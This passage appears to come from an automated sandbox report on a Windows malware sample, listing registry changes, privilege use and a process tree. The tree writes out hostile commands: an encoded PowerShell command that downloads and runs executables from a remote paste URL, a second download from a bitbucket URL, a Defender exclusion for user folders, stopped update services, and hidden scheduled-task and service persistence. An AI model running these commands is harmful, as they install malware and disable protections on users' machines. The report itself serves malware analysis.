| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000005ed3fdd612b1da015ed3fdd612b1da015ed3fdd612b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000a2244700350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc025f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc025f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff = 1fa855e012b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe
"C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe"
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b1.exe
"C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b1.exe"
C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe
"C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b2.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9DE6.tmp\9DE7.tmp\9DE8.bat C:\Users\Admin\AppData\Roaming\z2pbghwe.x3b0.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 1251
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "tf_win64.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "dota2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "cs2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RustClient.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "GTA5.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "TslGame.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "steam.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 1
